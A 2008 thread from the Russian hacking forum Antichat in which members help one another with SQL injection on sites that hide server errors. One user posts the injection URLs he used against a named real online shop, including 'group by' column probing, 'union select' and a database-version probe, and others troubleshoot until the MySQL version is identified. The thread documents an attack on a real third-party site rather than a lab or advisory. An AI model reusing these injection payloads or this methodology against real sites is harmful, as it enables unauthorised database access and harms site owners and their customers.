20.03.2008, 17:52
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
чет не то
|
|
|
20.03.2008, 17:58
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
т.е. это прокатит если знаешь кол-во столбцев, а если нет...
|
|
|
|
20.03.2008, 18:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 bag
Сформулируй вопрос яснее.Если ты имеешь ввиду как узнать есть ли инъекция при отключенных ошибках сервера то нужно почитать статьи т.к способов очень много и сдесь их все не изложишь Например эту:
_http://forum.antichat.ru/threadnav43966-1-10.html
Ну а вооще какой вопрос -такой ответ Dima-k17 написал тебе именно то ,что ты спросил
|
|
|
|
20.03.2008, 18:27
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
да я имею ввиду как узнать есть ли инъекция при отключенных ошибках сервера, статьи читал, я ищу более менее универсальный метод, вывод текста на страницу было бы самое то  |
|
|
|
20.03.2008, 18:46
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 4
С нами:
9553973
Репутация:
19
|
|
Столкнулся с такой проблемкой, мб поможете... Начнем с начала
Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php
Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php
Начал подбирать кол-во полей:
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка
Исходя из этого сделал вывод что столбец у нас один.
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
Последний раз редактировалось _3lf; 20.03.2008 в 22:03..
|
|
|
|
20.03.2008, 22:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Сообщение от _3lf
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
select 1 фозвращает число ОДИН, а не первый столбец
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
20.03.2008, 21:23
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
колличество то может быть и верное, а вот запрос неверный
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
20.03.2008, 22:06
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
очень возможно, что там подряд идет два запроса, отсюда , когда у тебя верен первый, второй возвращает ложь.
|
|
|
|
20.03.2008, 22:20
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=1+and+substr ing(version(),1,1)=3
мускул третий, нет юниона
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
20.03.2008, 23:10
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 4
С нами:
9553973
Репутация:
19
|
|
Сообщение от blackybr
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=1+and+substr ing(version(),1,1)=3
мускул третий, нет юниона
Спс, вкурил
|
|
|
|
|
 |
|
|
Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
|
|
|
|
Похожие темы
Комбинированный вид
